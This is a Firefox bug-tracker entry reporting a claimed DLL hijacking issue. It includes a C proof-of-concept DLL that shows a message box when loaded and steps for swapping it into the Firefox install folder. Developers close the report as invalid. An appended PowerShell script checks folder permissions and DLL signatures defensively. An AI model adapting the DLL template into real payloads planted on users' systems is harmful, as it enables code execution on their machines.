browserdirprovider.dll and brwsrcmp.dll is prone to DLL hijacking vulnerability

Status: VERIFIED INVALID
Product: Firefox
Component: Security
Priority: --
Severity: critical
Reported: 7 years ago
Modified: 7 years ago

People

Reporter: again.liu
Assignee: Unassigned

Tracking

Firefox Tracking Flags: (Not tracked)

Details

(Reporter)

Description

7 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12

A malicious DLL could be used to replace either browserdirprovider.dll or brwsrcmp.dll to execute arbitrary code.

Reproducible: Always

Steps to Reproduce:
Compile the following code.
Compiler: VC++ 2010 Express, Release configuration, Runtime Library: Multi-threaded (/MT)
===============================================================================
#include <Windows.h>

/* Runs when the DLL is loaded into the process: shows a message box as
   proof that code from the replaced DLL was executed. */
void init(void)
{
	MessageBoxA(NULL, "owned by moigai", "injected!!", MB_OK);
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
	(void)hModule;
	(void)lpReserved;
	switch (ul_reason_for_call)
	{
		case DLL_PROCESS_ATTACH:   /* first load into the process */
			init();
			break;
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
			break;
	}
	return TRUE;
}
===============================================================================

Then replace either of the two DLLs mentioned above (either will do) and start Firefox.
Actual Results:
The message box from the code above pops up when Firefox starts.

Comment 1

7 years ago
Yes, if you replace Firefox files, you can break it. That's not exactly news ;-)
Group: core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 7 years ago
Resolution: --- → INVALID
Duplicate of this bug: 609251

Comment 3

7 years ago
You could also replace firefox.exe with:

int main(void) {
	for (;;);
}

The effects would be left as an exercise for the reader!  ;-)
Status: RESOLVED → VERIFIED
> Yes, if you replace Firefox files, you can break it. That's not exactly news

Nor is it what's meant by "DLL hijacking".
Duplicate of this bug: 614530
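The triage point above is that overwriting files in the Firefox install directory already requires write access there, which is a permissions problem, not a DLL search-order hijack. A defender's check for that precondition, added here as an example and not part of the bug report or of Mozilla's code: it confirms the install directory and the two named DLLs are not writable by broad principals and that the DLLs carry a valid Authenticode signature. The install path, the principal list and the expectation of a Mozilla-signed build are assumptions.

```powershell
# Added example (not from the bug report): check that Firefox's install
# directory and the two DLLs named in the report are not writable by
# standard users and are Authenticode-signed. Path and principals are assumed.
$InstallDir = "$env:ProgramFiles\Mozilla Firefox"
$broadPrincipals = @('Everyone', 'BUILTIN\Users',
                     'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl

# True if any Allow ACE grants a write-class right to one of the broad principals.
function Test-BroadWriteAccess {
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($broadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

$findings = @()
if (Test-BroadWriteAccess -Path $InstallDir) {
    $findings += "install directory $InstallDir is writable by a broad principal"
}

foreach ($dll in @('browserdirprovider.dll', 'brwsrcmp.dll')) {
    $path = Join-Path $InstallDir $dll
    if (-not (Test-Path -LiteralPath $path)) {
        $findings += "$dll not present in $InstallDir"
        continue
    }
    $sig = Get-AuthenticodeSignature -FilePath $path
    if ($sig.Status -ne 'Valid') {
        $findings += "$dll signature status: $($sig.Status)"
    } elseif ($sig.SignerCertificate.Subject -notmatch 'Mozilla') {
        $findings += "$dll signed by unexpected publisher: $($sig.SignerCertificate.Subject)"
    }
    if (Test-BroadWriteAccess -Path $path) {
        $findings += "$dll is writable by a broad principal"
    }
}

if ($findings.Count -eq 0) { 'OK: DLLs signed and not writable by standard users' }
else { $findings | ForEach-Object { "FINDING: $_" } }
```

A finding on the directory or a DLL means a standard user could replace the module, which is the real defect; the signature check catches a replacement that has already happened.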